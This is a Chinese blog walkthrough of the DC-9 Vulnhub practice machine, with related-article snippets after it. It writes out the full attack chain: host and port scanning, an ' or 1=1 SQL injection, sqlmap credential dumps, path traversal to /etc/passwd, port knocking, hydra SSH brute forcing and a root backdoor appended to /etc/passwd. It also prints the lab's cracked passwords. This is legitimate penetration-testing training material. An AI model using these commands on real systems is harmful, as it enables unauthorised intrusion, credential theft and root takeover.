DC-9 靶场

最新推荐文章于 2024-09-27 20:30:07 发布
原创 最新推荐文章于 2024-09-27 20:30:07 发布 · 921 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络安全

 靶机地址:链接:https://pan.baidu.com/s/1kMLviFtz2JosS422-L1Tgw
提取码:c5ur

 1.主机发现

nmap -sP 192.168.128.1/24
arp-scan -l               #得到IP    192.168.128.131

2.端口扫描

nmap -p 1-65535 -A 192.168.128.131        # 22 80端口

 3.目录扫描

dirb http://192.168.128.131
或者nikto -host 192.168.128.131    这个查询到了config.php   但是打不开

 4.操作网站找信息

#发现查询点:
万能密码注入尝试:' or 1=1 -- -
#F12看到是post请求,抓包看到search参数
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" --dbs    查看所有的库名
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users --tables
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --columns
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --dump
这里更推荐直接全部dump 
##notepad可以直接按住alt区域选择复制,这样可以把很多的账密分开做成字典。
#暴力破解:WFuzz
wfuzz -z file,name.txt -z file,password.txt -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php #这里POST请求必须使用 -d   
wfuzz -z file,name.txt -z file,passwd.txt --hw 93 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
wfuzz -z file,name.txt -z file,passwd.txt --hh 1248 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
#没找到
**#尝试第二个数据库 Staff的信息。**
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D Staff -T Users  --dump
#找参数    #尝试了hw hh 的过滤方式,找不到对应的参数。  FUZZ后面带文件名(index.php,etc/passwd等),不带都尝试,考虑是字典还是参数不对。最后,想到回到根目录的   etc/passwd  使用../  
wfuzz -b 'PHPSESSID=in952k2in45a06pcdmht1aepi3' --hw 100 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.128.131/manage.php?FUZZ=../../../../../../etc/passwd

 5.爆破登录

#看到很多操作系统账号密码。这里爆破操作系统的账号密码。但是并不行
hydra -L name.txt -P passwd.txt 192.168.128.131 ssh  
**#22端口打开了,但是不能连接的原因?**
**1. 防护墙**
**2.所选用户不能使用22端口登录**
**3.linux服务:敲门 Knockd,确认方式:文件位置    /etc/knockd.conf    访问文件看到7469 **
**#用nmap对应敲门,只要访问了,就会打开的端口**
**nmap -p 7469 192.168.128.131**
**nmap -p 8475 192.168.128.131**
**nmap -p 9842 192.168.128.131**
#再次使用hydra爆破:  这里发现保存的字典,不能有任何空格
hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
#登录
ssh janitor@192.168.128.131 输入密码即可
#登录成功还是老操作。看东西:
1. history
2. ls -a 
3。 sudo -l
#发现密码,放到字典。继续hydra爆破:
hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
**#登录成功,重复操作,sudo -l有信息:以root的身份执行操作程序**
./opt/devstuff/dist/test/test   执行   #python test.py read append   读取内容追加内容的意思
#怎么找test.py的文件位置?
find / - name "test.py" 
find / -name "test.py" 2>/dev/null   # 2代表标准错误输出,过滤到某地
cat /opt/devstuff/test.py

 6.提取

#/etc/passwd的文件格式:密码是x的原因,在/etc/shadow里面,放在etc/passwd也可以
#第三位和第四位的数字是uid和gid,root用户是0 
#第五位是用户描述,第六位是用户的工作目录,第七位命令 解释程序(执行命令的工具)
**这里提取思路:创建一个用户    把uid和gid都设为0即可,加密方式得是hash加密。利用python的脚本,追加到test.py**
openssl passwd  -1 -salt  admin 123456       $1$admin$LClYcRe.ee8dQwgrFc5nz.
完整的账密应该是:  admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.
admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash    最后的解释脚本目录
在有权限的用户的下输入  echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
sudo ./test /tmp/passwd  /etc/passwd 
#可以看到新增了一个用户
cat /etc/passwd  
su root
输入密码

7.笔记本:(记录收集到的信息和思路)

22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))   #有apache   有/var/www目录
网页主页有一堆个人信息
目录扫描:
==> DIRECTORY: http://192.168.128.131/css/                                                                          
==> DIRECTORY: http://192.168.128.131/includes/   #没用

+---------------+-----------+
| password      | username  |
+---------------+-----------+
| 3kfs86sfd     | marym     |
| 468sfdfsd2    | julied    |
| 4sfd87sfd1    | fredf     |
| RocksOff      | barneyr   |
| TC&TheBoyz    | tomc      |
| B8m#48sd      | jerrym    |
| Pebbles       | wilmaf    |
| BamBam01      | bettyr    |
| UrAG0D!       | chandlerb |
| Passw0rd      | joeyt     |
| yN72#dsd      | rachelg   |
| ILoveRachel   | rossg     |
| 3248dsds7s    | monicag   |
| smellycats    | phoebeb   |
| YR3BVxxxw87   | scoots    |
| Ilovepeepee   | janitor   |
| Hawaii-Five-0 | janitor2  |
+---------------+-----------+
第一个数据库账密不行     换数据库查
admin  transorbital1
看到一个。。。。**File does not exist  **
**考虑考虑文件包含---》找参数。。**
这里**注意:在登录时找参数,所以,直接用wfuzz找参数是一个没登陆的状态。带上cookie值,才是以登录的状态查找cookie值**
参数为     "file"

[22][ssh] host: 192.168.128.131   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.128.131   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.128.131   login: janitor   password: Ilovepeepee
后面收集到的
login: fredf   password: B4-Tru3-001

import sys


if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)


else :
    f = open(sys.argv[1], "r")
    output = (f.read())


    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
读取任意文件内容,追加到任意文件中去
vulnhub靶场DC-9
kukudeshuo的博客
07-17 1189
vulnhub靶场DC-9 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-9(192.168.58.155) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.155 使用nmap扫描查看目标靶机端口开放情况 可以看到扫描结果是开放了22、80端口,但是22端口被过滤了 浏览器访问目标靶机80端口 使用浏览器插件wappal
vulnhub靶场DC-9
qq_58091216的博客
01-15 1483
发现这里有个脚本文件可以无密码以root用户权限执行,我们进入/opt/devstuff/dist/test目录下先看看有什么信息,全是文件,回到上一个目录查看,也没什么,再回到上一个目录查看,在/opt/devstuff目录下发现了一个test.py脚本文件。这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,事先参考。
Vulnhub靶机DC系列-DC-9
m0_54525483的博客
01-13 2874
Vulnhub靶机DC系列-DC-9 靶场环境 靶场名称:DC-9 靶场地址:https://www.vulnhub.com/entry/dc-9,412/ 下载地址: DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9.zip Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip Download (Torrent): https://download
DC-9靶场
mlws1900的博客
03-29 1532
发现靶机的ip地址为192.168.111.137,攻击机(kali)的ip地址为192.168.111.128。,而且需要按照顺序‘敲’端口。登录成功,下面显示file does not exist ,怀疑包含了某文件,所以尝试文件包含。将这一串密码加入刚刚的爆破密码中,重新进行爆破,生成newpass.txt。openssl生成密码,前一个mlws为账号,后一个1900为要加密的密码。发现代码作用需要两个文件,把第一文件追加到第二个文件后。使用test文件,将该文件的内容写入到passwd中。
vulnhub DC9 靶场练习
鸥鹭忘机
09-05 2236
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC靶场系列是模拟真实环境提供渗透测试练习的平台,其中DC1靶场则是该系列的第一个练习环境。DC1靶场通常包含一系列的关卡,每一个关卡都设计有不同的安全挑战,供渗透测试人员练习和提升技能。 DC1靶场通关详细...
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 7543
dc-9靶场详细渗透过程
DC靶场系列-DC9靶场-渗透测试靶场
03-06
DC靶场系列中的DC9靶场是一个专门为渗透测试练习而设计的模拟环境。它允许测试者在没有法律风险的环境下进行各种网络攻击手段的实践,如SQL注入、XSS攻击、目录遍历等,从而提高自身的技术水平和安全意识。 DC9靶场...
DC系列靶场---DC 9靶场的渗透测试
zhouA0221的博客
08-13 1649
先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录。这里我们看到一个password文件,打开之后看到好多个秘密,我把密码放到我们的passwd文件中。
DC-2靶场详细教程
2301_77518341的博客
09-27 2602
DC-2靶场实验报告一、环境搭建:1. 靶场描述靶场描述与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没
DC-9靶场实战
qq_42754807的博客
03-20 1340
DC-9靶场实战
靶场练习第十七天~vulnhub靶场dc-9
qq_57976347的博客
02-16 950
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
DC9靶场渗透
qq_20032803的博客
02-03 804
1.发现主机/扫描 root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.100.128 netmask 255.255.255.0 broadcast 192.168.100.255 inet6 fe80::20c:29ff:fe72:6e3e prefixlen 64 scopeid 0x20<link>
Vulhub 靶场训练 DC-9解析
黑战士的博客
02-26 689
3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去。/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口。运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。
Vulnhub DC-9靶场
weixin_47019868的博客
11-25 245
Vulnhub DC-9靶场
DC渗透系列】DC-9靶场
xydsg的博客
02-01 763
我这里使用无糖的软件直接扫。
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2323
vulnhub靶场渗透练习详解——DC9
vulnhub之DC9靶机
LainWith的博客
02-15 3598
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
渗透测试学习之靶机DC-9
情感博主V
03-17 1985
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.146 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.146 web站点相关服务信息 目录信息 注:不要试着访问welcome.php、session.php和addrecord.php不然会直接跳到登录后的页面,但是并不能做...
DC-1靶场
最新发布
03-21
好的,我现在需要帮助用户查找与DC-1靶场相关的IT内容或项目。首先,用户提供的引用中有提到DC-1渗透靶场实战速通版,引用[4]提到了一些具体步骤,比如退出数据库、查看用户信息等。这可能意味着DC-1是一个用于渗透...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值